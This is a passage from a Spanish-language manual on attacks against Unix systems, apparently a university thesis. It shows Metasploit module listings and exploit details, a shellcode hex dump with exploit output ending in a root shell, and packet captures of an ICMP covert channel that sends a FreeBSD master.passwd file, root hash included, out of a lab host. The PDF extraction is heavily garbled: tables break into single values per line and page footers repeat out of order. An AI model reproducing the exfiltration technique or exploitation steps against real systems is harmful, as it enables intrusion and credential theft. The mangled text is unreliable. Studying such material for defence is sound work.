cualquier cosa con l. MSF dispone de mdulos para conexin a Bases de
Datos (PostgreSQL, MySQL y SQLite), otro que ejecuta MSF como un
servicio en un socket, etc. De esta manera, el plugin para conexin a bases
de datos permite, por ejemplo, atacar un conjunto de hosts de acuerdo al
contenido de una tabla.
Description
----------You're looking at it baby!
Show information about this module
Show available options for this module
Show available advanced options for this module
Show available ids evasion options for this module
Show available payloads for this module
Show available targets for this exploit module
Show available actions for this auxiliary module
Run the check routine of the selected module
Execute the selected module
Exploits
========
Name
---exploit/bsdi/softcart/mercantec_softcart
Overflow
exploit/freebsd/tacacs/xtacacsd_report
Buffer Overflow
exploit/hpux/lpd/cleanup_exec
[...]
Description
----------Mercantec SoftCart CGI
XTACACSD <= 4.1.2 report()
HP-UX LPD Command Execution
Auxiliary
=========
Name
---auxiliary/admin/backupexec/dump
Remote File Access
auxiliary/admin/backupexec/registry
Registry Access
auxiliary/admin/cisco/ios_http_auth_bypass
Administrative Access
[...]
Description
----------Veritas Backup Exec Windows
Veritas Backup Exec Server
Cisco IOS HTTP Unauthorized
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 140 de 229
msf v3.1-release
269 exploits - 118 payloads
17 encoders - 6 nops
46 aux
info exploit/linux/ids/snortbopre
Name:
Version:
Platform:
Privileged:
License:
Provided by:
KaiJern Lau <xwings@mysec.org>
Available targets:
Id Name
-- ---0
Debian 3.1 Sarge
Basic options:
Name
Current Setting
-----------------RHOST
RPORT 9080
Required
-------yes
yes
Description
----------The target address
The target port
Payload information:
Space: 1073
Avoid: 1 characters
Description:
This module exploits a stack overflow in the Back Orifice
pre-processor module included with Snort versions 2.4.0, 2.4.1,
2.4.2, and 2.4.3. This vulnerability could be used to completely
compromise a Snort sensor, and would typically gain an attacker full
root or administrative privileges.
References:
http://www.securityfocus.com/bid/15131
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-3252
http://xforce.iss.net/xforce/alerts/id/207
msf > show exploits
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 141 de 229
Name
------RHOST
THREADS
RPORT
Default
------25
139
Description
--------------------------------The target address
The number of concurrent attempts
The samba port
164 Samba es un software para Unix que implementa el protocolo SMB/CIFS, que es el que utiliza
Windows para compartir archivos e impresoras en una Red. Adems, permite integrar
estaciones de trabajo Unix a redes Windows. URL: http://www.samba.org
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 142 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 143 de 229
0
1
2
3
4
5
6
7
Samba
Samba
Samba
Samba
Samba
Samba
Samba
Samba
Linux
Linux
Linux
Linux
Linux
Linux
Linux
Linux
Linux
IA32
IA32
IA32
IA32
IA32
IA32
IA32
IA32
IA32
Add User
Bind Shell
Staged Bind Shell
Execute Command
Recv Tag Findsock Shell
Staged Findsock Shell
SrcPort Findsock Shell
Reverse Shell
Reverse Impurity
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 144 de 229
exploits que no estn del todo completos (como ste) con respecto a la versin
anterior, y el equipo de desarrollo an trabaja en migrar los que falten o ampliar
los que estn en cuanto a caractersticas.
Se puede ver que el exploit en MSF v2.7 se llama samba_nttrans, y
corresponde a un ataque de Buffer Overflow detallado en el CVE-2003-0085165 y
165 URL del Reporte: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0085
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 145 de 229
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
07
eb
eb
eb
eb
eb
eb
eb
eb
eb
eb
90
01
e3
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
08
0c
0c
0c
0c
0c
0c
0c
0c
0c
0c
90
50
fe
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
............x...
................
................
................
................
................
................
................
................
................
................
................
..1.C..tQ.-....P
..j.X......1....
.Yj.X.........
padchunk_size = 0x00000018
==> 15
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
#######################################################################
#####
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Linux rh62 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i?86 unknown
pwd
/home/ftp
ls
cd /
pwd
/
ls
bin
lost+found
boot
mnt
dev
opt
etc
proc
home
root
lib
sbin
tmp
usr
var
Tcnicas
comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 147 de 229
uname -a
Linux rh62 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i?86 unknown
id
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Learn
Security
Online:
Incluye
cursos,
informacin
varios
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 149 de 229
Bits 03
Version
47
815
1618
1931
32
Identificador de Secuencia
64
Time to Live
Flags
96
ID de Protocolo
128
160
Opciones (opcional)
160/192+ Datos
Bits 3-6
Precedencia
Tipo de Servicio
Bit 7
Reservado
Bits 6-7
Campo DS - DiffServ
Flags:
Bit 0
Bit 1
Bit 2
Reservado
No Fragmentar - DF
Ms Fragmentos - MF
Longitud Total en Bytes (16 bits): Contiene la longitud total del datagrama,
incluyendo encabezado y payload.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 150 de 229
Time To Live (TTL) (8 bits): Lmite mximo de saltos por los cuales este
paquete puede ser enrutado.
Bits 03
offset
47
815
1631
32
Puerto Destino
64
96
Offset de Datos Reservado CWR ECE URG ACK PSH RST SYN FIN Window Size
128
Checksum
160
Opciones (opcional)
Puntero Urgente
160/192+ Datos
Puerto Destino (16 Bits): 2 Bytes indicando el puerto destino del segmento
TCP. Por ejemplo, 22=0x00 0x16.
Si el bit de SYN est activado (es igual a 0x1), entonces este nmero
es el ISN (Initial Secuence Number Nmero de Secuencia Inicial) y
el primer byte de datos es el nmero de secuencia ms uno.
Nmero de ACK (32 Bits): Si el bit de ACK est activado (0x1), entonces el
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 1 de 229
Flags (8 Bits):
Puntero Urgente (16 Bits): Si el bit URG est activado, este valor es el
desplazamiento (offset) que hay que sumar al valor del Nmero de Secuencia
para obtener el ltimo byte de los datos urgentes.
Bits 0 - 15
16 - 31
Puerto UDP Origen - Source Port Puerto UDP Destino - Destination Port
Longitud
Checksum
Datos
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 2 de 229
Puerto Destino (16 Bits): 2 Bytes indicando el puerto destino del datagrama
UDP.
Bits 0 - 7
Bits 8-15
Tipo de ICMP
Cdigo
32
Bits 16-31
Checksum
ID Identificador
Nmero de Secuencia
Cdigo (8 Bits): En caso de que sea necesario (para algunos tipos de paquete
ICMP), este campo brinda ms informacin. Por ejemplo, si el campo Tipo
es igual a 0x3, este campo puede tener valores desde el 0 (Red Destino
Inalcanzable - Destination Network Unreachable) al 13 (Comunicacin
Administrativamente
Prohibida
Communication
Administratively
Prohibited).
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 3 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 4 de 229
IP
RAM
Sistema Operativo
Saturno
192.168.0.2
1,5GB
Tornado
192.168.0.20
128MB
Ciclon
192.168.0.30
256MB
Trueno
192.168.0.60
256MB
Tsunami
192.168.0.100
256MB
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 6 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 7 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 8 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 9 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 10 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 11 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 12 de 229
Tell 192.168.0.2
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 13 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 14 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 15 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 16 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 17 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 18 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 19 de 229
Tell 192.168.0.2
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 20 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 21 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 22 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 23 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 24 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 25 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 26 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 27 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 28 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 29 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 30 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 31 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 32 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 33 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 34 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 35 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 36 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 37 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 38 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 39 de 229
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
db
08
6b
20
70
30
36
0a
6c
96
8f
00
64
73
61
35
20
72
24
5b
00
40
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1d
00
20
74
2c
30
6b
24
37
e1
69
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@..i......
....@.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 40 de 229
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
38
00
64
73
61
35
20
72
24
a2
00
48
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
00
20
74
2c
30
6b
24
37
96
c0
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..t8..@.........
....H.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
30
20
63
72
72
73
6e
17
94
02
63
3a
26
61
3a
6e
65
3a
31
b8
08
6b
30
3a
6c
2a
65
72
96
ba
00
64
3a
2f
2f
3a
2d
3a
5b
00
17
6f
3a
72
62
30
61
2f
1f
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
0c
01
12
76
30
74
2f
3a
69
6f
29
40
01
56
3a
3a
62
3a
6e
74
e1
3e
00
48
43
2f
61
30
20
3a
a2
c0
63
54
68
75
73
3a
53
0a
26
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
1e
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..1.[...)..&..E.
......@.@>......
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$ less 2-Covert\ Channel\ con\ HPing\ -\ Completo.txt
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$ less 2-Covert\ Channel\ con\ HPing\ -\ Completo.txt
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$ cat 2-Covert\ Channel\ con\ HPing\ -\ Completo.txt
Frame 1 (162 bytes on wire, 162 bytes captured)
Ethernet II, Src: 00:0c:29:e1:a2:26 (00:0c:29:e1:a2:26), Dst: 00:17:31:96:5b:1f
(00:17:31:96:5b:1f)
Internet Protocol, Src: 192.168.0.30 (192.168.0.30), Dst: 192.168.0.2
(192.168.0.2)
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0 ()
Checksum: 0x4004 [correct]
Identifier: 0x1812
Sequence number: 0 (0x0000)
Data (120 bytes)
Data: 636C6176656261636B646F6F72232024467265654253443A...
0000
0010
0020
0030
0040
0050
0060
0070
00
00
00
61
44
72
32
3a
17
94
02
63
3a
2e
30
35
31
db
08
6b
20
70
30
36
96
8f
00
64
73
61
35
20
5b
00
40
6f
72
73
2f
62
1f
00
04
6f
63
73
30
72
00
40
18
72
2f
77
36
6f
0c
01
12
23
65
64
2f
6f
29
1d
00
20
74
2c
30
6b
e1
69
00
24
63
76
36
73
a2
c0
63
46
2f
20
20
20
26
a8
6c
72
6d
31
32
45
08
00
61
65
61
2e
30
78
00
1e
76
65
73
34
3a
70
45
c0
65
42
74
30
31
20
00
a8
62
53
65
20
39
24
..1.[...)..&..E.
......@..i......
....@.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 41 de 229
0a 23 0a 72 6f 6f 74 3a 24 31 24 71 46 71 6b 2e
30 30 6c 24 50 43 4f 62 37 57 64 67 52 6c 51 64
72 48
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
38
00
64
73
61
35
20
72
24
a2
00
48
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
00
20
74
2c
30
6b
24
37
96
c0
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..t8..@.........
....H.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
30
20
63
72
72
73
6e
17
94
02
63
3a
26
61
3a
6e
65
3a
31
b8
08
6b
30
3a
6c
2a
65
72
96
ba
00
64
3a
2f
2f
3a
2d
3a
5b
00
17
6f
3a
72
62
30
61
2f
1f
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
0c
01
12
76
30
74
2f
3a
69
6f
29
40
01
56
3a
3a
62
3a
6e
74
e1
3e
00
48
43
2f
61
30
20
3a
a2
c0
63
54
68
75
73
3a
53
0a
26
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
1e
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..1.[...)..&..E.
......@.@>......
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
00 0c 29 e1 a2 26 00 17 31 96 5b 1f 08 00 45 00
00 94 74 39 00 00 40 01 84 bf c0 a8 00 02 c0 a8
..)..&..1.[...E.
..t9..@.........
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 42 de 229
00
61
30
20
63
72
72
73
6e
1e
63
3a
26
61
3a
6e
65
3a
00
6b
30
3a
6c
2a
65
72
00
64
3a
2f
2f
3a
2d
3a
1f
6f
3a
72
62
30
61
2f
21
6f
30
6f
69
3a
67
72
18
72
3a
6f
6e
30
61
6f
12
76
30
74
2f
3a
69
6f
01
56
3a
3a
62
3a
6e
74
00
48
43
2f
61
30
20
3a
63
54
68
75
73
3a
53
0a
6c
61
61
73
68
30
75
64
61
6c
72
72
0a
3a
70
61
76
4b
6c
2f
74
42
65
65
65
30
69
6c
6f
6f
72
6d
62
3a
65
6f
6f
75
75
6f
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
00
00
00
61
30
73
3a
2f
72
74
6e
17
94
02
63
3a
79
2f
6e
3a
65
2f
31
c1
08
6b
4f
73
72
6f
2a
6d
96
bf
00
64
77
74
6f
6c
3a
20
5b
00
46
6f
6e
65
6f
6f
32
26
1f
00
45
6f
65
6d
74
67
3a
3a
00
40
18
72
72
20
3a
69
35
2f
0c
01
12
2a
20
70
2f
6e
3a
3a
29
37
02
3a
6f
72
75
0a
3a
2f
e1
39
00
31
66
6f
73
6f
30
75
a2
c0
63
3a
20
63
72
70
3a
73
26
a8
6c
31
6d
65
2f
65
30
72
08
00
61
3a
61
73
73
72
3a
2f
00
1e
76
3a
6e
73
62
61
53
73
45
c0
65
30
79
65
69
74
79
62
00
a8
62
3a
20
73
6e
6f
73
69
..1.[...)..&..E.
......@.79......
....FE....claveb
ackdoor*:1:1::0:
0:Owner of many
system processes
:/root:/usr/sbin
/nologin.operato
r:*:2:5::0:0:Sys
tem &:/:/usr/sbi
n/
00
00
00
61
30
73
3a
2f
72
74
6e
0c
94
1e
63
3a
79
2f
6e
3a
65
2f
29
74
00
6b
4f
73
72
6f
2a
6d
e1
3a
00
64
77
74
6f
6c
3a
20
a2
00
4e
6f
6e
65
6f
6f
32
26
26
00
45
6f
65
6d
74
67
3a
3a
00
40
18
72
72
20
3a
69
35
2f
17
01
12
2a
20
70
2f
6e
3a
3a
31
84
02
3a
6f
72
75
0a
3a
2f
96
be
00
31
66
6f
73
6f
30
75
5b
c0
63
3a
20
63
72
70
3a
73
1f
a8
6c
31
6d
65
2f
65
30
72
08
00
61
3a
61
73
73
72
3a
2f
00
02
76
3a
6e
73
62
61
53
73
45
c0
65
30
79
65
69
74
79
62
00
a8
62
3a
20
73
6e
6f
73
69
..)..&..1.[...E.
..t:..@.........
....NE....claveb
ackdoor*:1:1::0:
0:Owner of many
system processes
:/root:/usr/sbin
/nologin.operato
r:*:2:5::0:0:Sys
tem &:/:/usr/sbi
n/
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 43 de 229
00
00
00
61
69
6e
61
72
74
30
2f
17
94
02
63
6e
61
6e
2f
79
3a
75
31
0f
08
6b
3a
72
64
73
3a
54
96
27
00
64
2a
69
20
62
2a
74
5b
00
fb
6f
3a
65
53
69
3a
79
1f
00
c8
6f
33
73
6f
6e
34
20
00
40
18
72
3a
20
75
2f
3a
53
0c
01
12
6e
37
43
72
6e
36
61
29
e9
03
6f
3a
6f
63
6f
35
6e
e1
d1
00
6c
3a
6d
65
6c
35
64
a2
c0
63
6f
30
6d
3a
6f
33
62
26
a8
6c
67
3a
61
2f
67
33
6f
08
00
61
69
30
6e
3a
69
3a
78
00
1e
76
6e
3a
64
2f
6e
3a
3a
45
c0
65
0a
42
73
75
0a
30
2f
00
a8
62
62
69
20
73
74
3a
3a
..1.[...)..&..E.
...'..@.........
..........claveb
ackdoornologin.b
in:*:3:7::0:0:Bi
naries Commands
and Source:/:/us
r/sbin/nologin.t
ty:*:4:65533::0:
0:Tty Sandbox:/:
/u
00
00
00
61
69
6e
61
72
74
30
2f
0c
94
1e
63
6e
61
6e
2f
79
3a
75
29
74
00
6b
3a
72
64
73
3a
54
e1
3b
00
64
2a
69
20
62
2a
74
a2
00
03
6f
3a
65
53
69
3a
79
26
00
c9
6f
33
73
6f
6e
34
20
00
40
18
72
3a
20
75
2f
3a
53
17
01
12
6e
37
43
72
6e
36
61
31
84
03
6f
3a
6f
63
6f
35
6e
96
bd
00
6c
3a
6d
65
6c
35
64
5b
c0
63
6f
30
6d
3a
6f
33
62
1f
a8
6c
67
3a
61
2f
67
33
6f
08
00
61
69
30
6e
3a
69
3a
78
00
02
76
6e
3a
64
2f
6e
3a
3a
45
c0
65
0a
42
73
75
0a
30
2f
00
a8
62
62
69
20
73
74
3a
3a
..)..&..1.[...E.
..t;..@.........
..........claveb
ackdoornologin.b
in:*:3:7::0:0:Bi
naries Commands
and Source:/:/us
r/sbin/nologin.t
ty:*:4:65533::0:
0:Tty Sandbox:/:
/u
00
00
00
61
6f
36
53
62
73
6d
2f
17
94
02
63
6c
35
61
69
3a
65
75
31
09
08
6b
6f
35
6e
6e
2a
73
96
1f
00
64
67
33
64
2f
3a
20
5b
00
b6
6f
69
33
62
6e
37
70
1f
00
e8
6f
6e
3a
6f
6f
3a
73
00
40
18
72
0a
3a
78
6c
31
65
0c
01
12
73
6b
30
3a
6f
33
75
29
ef
04
72
6d
3a
2f
67
3a
64
e1
d9
00
2f
65
30
3a
69
3a
6f
a2
c0
63
73
6d
3a
2f
6e
30
2d
26
a8
6c
62
3a
4b
75
0a
3a
75
08
00
61
69
2a
4d
73
67
30
73
00
1e
76
6e
3a
65
72
61
3a
65
45
c0
65
2f
35
6d
2f
6d
47
72
00
a8
62
6e
3a
20
73
65
61
3a
..1.[...)..&..E.
......@.........
..........claveb
ackdoorsr/sbin/n
ologin.kmem:*:5:
65533::0:0:KMem
Sandbox:/:/usr/s
bin/nologin.game
s:*:7:13::0:0:Ga
mes pseudo-user:
/u
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 44 de 229
00
00
00
61
6f
36
53
62
73
6d
2f
0c
94
1e
63
6c
35
61
69
3a
65
75
29
74
00
6b
6f
35
6e
6e
2a
73
e1
3c
00
64
67
33
64
2f
3a
20
a2
00
be
6f
69
33
62
6e
37
70
26
00
e8
6f
6e
3a
6f
6f
3a
73
00
40
18
72
0a
3a
78
6c
31
65
17
01
12
73
6b
30
3a
6f
33
75
31
84
04
72
6d
3a
2f
67
3a
64
96
bc
00
2f
65
30
3a
69
3a
6f
5b
c0
63
73
6d
3a
2f
6e
30
2d
1f
a8
6c
62
3a
4b
75
0a
3a
75
08
00
61
69
2a
4d
73
67
30
73
00
02
76
6e
3a
65
72
61
3a
65
45
c0
65
2f
35
6d
2f
6d
47
72
00
a8
62
6e
3a
20
73
65
61
3a
..)..&..1.[...E.
..t<..@.........
..........claveb
ackdoorsr/sbin/n
ologin.kmem:*:5:
65533::0:0:KMem
Sandbox:/:/usr/s
bin/nologin.game
s:*:7:13::0:0:Ga
mes pseudo-user:
/u
00
00
00
61
2f
6e
30
3a
6f
30
61
17
94
02
63
75
0a
3a
2f
67
3a
67
31
09
08
6b
73
6e
4e
3a
69
30
96
6d
00
64
72
65
65
2f
6e
3a
5b
00
8e
6f
2f
77
77
75
0a
4d
1f
00
0e
6f
73
73
73
73
6d
69
00
40
18
72
62
3a
20
72
61
73
0c
01
12
73
69
2a
53
2f
6e
74
29
ef
05
72
6e
3a
75
73
3a
65
e1
8b
00
2f
2f
38
62
62
2a
72
a2
c0
63
67
6e
3a
73
69
3a
20
26
a8
6c
61
6f
38
79
6e
39
4d
08
00
61
6d
6c
3a
73
2f
3a
61
00
1e
76
65
6f
3a
74
6e
39
6e
45
c0
65
73
67
30
65
6f
3a
20
00
a8
62
3a
69
3a
6d
6c
3a
50
..1.[...)..&..E.
...m..@.........
..........claveb
ackdoorsr/games:
/usr/sbin/nologi
n.news:*:8:8::0:
0:News Subsystem
:/:/usr/sbin/nol
ogin.man:*:9:9::
0:0:Mister Man P
ag
00
00
00
61
2f
6e
30
3a
6f
30
0c
94
1e
63
75
0a
3a
2f
67
3a
29
74
00
6b
73
6e
4e
3a
69
30
e1
3d
00
64
72
65
65
2f
6e
3a
a2
00
96
6f
2f
77
77
75
0a
4d
26
00
0e
6f
73
73
73
73
6d
69
00
40
18
72
62
3a
20
72
61
73
17
01
12
73
69
2a
53
2f
6e
74
31
84
05
72
6e
3a
75
73
3a
65
96
bb
00
2f
2f
38
62
62
2a
72
5b
c0
63
67
6e
3a
73
69
3a
20
1f
a8
6c
61
6f
38
79
6e
39
4d
08
00
61
6d
6c
3a
73
2f
3a
61
00
02
76
65
6f
3a
74
6e
39
6e
45
c0
65
73
67
30
65
6f
3a
20
00
a8
62
3a
69
3a
6d
6c
3a
50
..)..&..1.[...E.
..t=..@.........
..........claveb
ackdoorsr/games:
/usr/sbin/nologi
n.news:*:8:8::0:
0:News Subsystem
:/:/usr/sbin/nol
ogin.man:*:9:9::
0:0:Mister Man P
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 45 de 229
61 67
ag
00
00
00
61
68
69
2a
75
3a
2f
6d
17
94
02
63
61
6e
3a
72
2f
73
73
31
01
08
6b
72
2f
32
65
76
62
96
ca
00
64
65
6e
32
20
61
69
5b
00
5b
6f
2f
6f
3a
53
72
6e
1f
00
b2
6f
6d
6c
32
68
2f
2f
00
40
18
72
61
6f
32
65
65
6e
0c
01
12
65
6e
67
3a
6c
6d
6f
29
f7
06
73
3a
69
3a
6c
70
6c
e1
2e
00
3a
2f
6e
30
20
74
6f
a2
c0
63
2f
75
0a
3a
44
79
67
26
a8
6c
75
73
73
30
61
3a
69
08
00
61
73
72
73
3a
65
2f
6e
00
1e
76
72
2f
68
53
6d
75
0a
45
c0
65
2f
73
64
65
6f
73
73
00
a8
62
73
62
3a
63
6e
72
6d
..1.[...)..&..E.
......@.........
....[.....claveb
ackdoores:/usr/s
hare/man:/usr/sb
in/nologin.sshd:
*:22:22::0:0:Sec
ure Shell Daemon
:/var/empty:/usr
/sbin/nologin.sm
ms
00
00
00
61
68
69
2a
75
3a
2f
6d
0c
94
1e
63
61
6e
3a
72
2f
73
73
29
74
00
6b
72
2f
32
65
76
62
e1
3e
00
64
65
6e
32
20
61
69
a2
00
63
6f
2f
6f
3a
53
72
6e
26
00
b2
6f
6d
6c
32
68
2f
2f
00
40
18
72
61
6f
32
65
65
6e
17
01
12
65
6e
67
3a
6c
6d
6f
31
84
06
73
3a
69
3a
6c
70
6c
96
ba
00
3a
2f
6e
30
20
74
6f
5b
c0
63
2f
75
0a
3a
44
79
67
1f
a8
6c
75
73
73
30
61
3a
69
08
00
61
73
72
73
3a
65
2f
6e
00
02
76
72
2f
68
53
6d
75
0a
45
c0
65
2f
73
64
65
6f
73
73
00
a8
62
73
62
3a
63
6e
72
6d
..)..&..1.[...E.
..t>..@.........
....c.....claveb
ackdoores:/usr/s
hare/man:/usr/sb
in/nologin.sshd:
*:22:22::0:0:Sec
ure Shell Daemon
:/var/empty:/usr
/sbin/nologin.sm
ms
00
00
00
61
17
94
02
63
31
89
08
6b
96
20
00
64
5b
00
d1
6f
1f
00
56
6f
00
40
18
72
0c
01
12
70
29
6f
07
3a
e1
d8
00
2a
a2
c0
63
3a
26
a8
6c
32
08
00
61
35
00
1e
76
3a
45
c0
65
32
00
a8
62
35
..1.[...)..&..E.
... ..@.o.......
.....V....claveb
ackdoorp:*:25:25
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 46 de 229
3a
75
76
6d
2f
6c
